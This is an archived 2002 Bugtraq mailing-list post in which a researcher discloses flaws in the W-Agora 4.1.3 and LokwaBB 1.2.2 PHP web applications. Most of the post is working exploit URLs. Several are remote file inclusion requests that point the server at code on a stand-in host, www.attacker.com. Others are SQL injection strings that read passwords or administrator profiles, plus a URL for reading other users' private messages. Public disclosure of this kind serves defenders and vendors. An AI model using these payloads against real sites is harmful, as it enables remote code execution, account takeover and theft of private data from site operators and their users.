Security holes in LokwaBB and W-Agora

From: Frog Man (leseulfrogat_private)
Date: Sat Jun 08 2002 - 04:43:21 PDT

  • Next message: ash: "RE: Phone Switches + telephone banking etc"

    Somebody advised me to post also on bugtraq not only on vuln-dev, I thus do 
    it :)  I just hope that doesn't give more work to the webmasters.
    
    Product 1 :
    ***********
    W-Agora 4.1.3
    http://www.w-agora.net
    
    Problem :
    - Including file
    
    Exploits :
    - With a file http://www.attacker.com/dbaccess.txt :
    http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt
    http://[target]/include/postgres65.php?inc_dir=http://www.attacker.com&ext=txt
    http://[target]/include/mysql.php?inc_dir=http://www.attacker.com&ext=txt
    http://[target]/include/mssql7.php?inc_dir=http://www.attacker.com&ext=txt
    http://[target]/include/msql.php?inc_dir=http://www.attacker.com&ext=txt
    
    - With a file http://www.attacker.com/postgres65.txt :
    http://[target]/include/postgres.php?inc_dir=http://www.attacker.com&ext=txt
    
    - With the file http://www.attacker.com/auth.txt :
    http://[target]/user/agora_user.php?inc_dir=http://www.attacker.com&ext=txt
    http://[target]/user/ldap_example.php?inc_dir=http://www.attacker.com&ext=txt
    
    More details in french :
    http://www.ifrance.com/kitetoua/tuto/W-Agora.txt
    
    Translated by Goolge :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FW-Agora.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools
    
    Product 2 :
    ***********
    LokwaBB 1.2.2
    http://lokwa.farcom.com/
    
    Problems :
    - XSS
    - Privates messages reading
    - SQL Injection
    
    Exploits :
    - 
    http://[target]/member.php?action=viewpro&member='%20OR%20password='PASSWORD
    - 
    http://[target]/member.php?action=viewpro&member='%20OR%20status='Administrator
    - misc.php?action=forgot&send=yes&loser='%20OR%20password='PASSWORD
    - http://[target]/pm.php?action=reply&pmid=[MESSAGE ID]
    
    More details in french :
    http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt
    
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FLokwaBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools
    
    
    
    Sorry for my poor english :)
    frog-m@n
    
    
    
    _________________________________________________________________
    Téléchargez MSN Explorer gratuitement à l'adresse 
    http://explorer.msn.fr/intl.asp.
    



    This archive was generated by hypermail 2b30 : Sat Jun 08 2002 - 10:37:52 PDT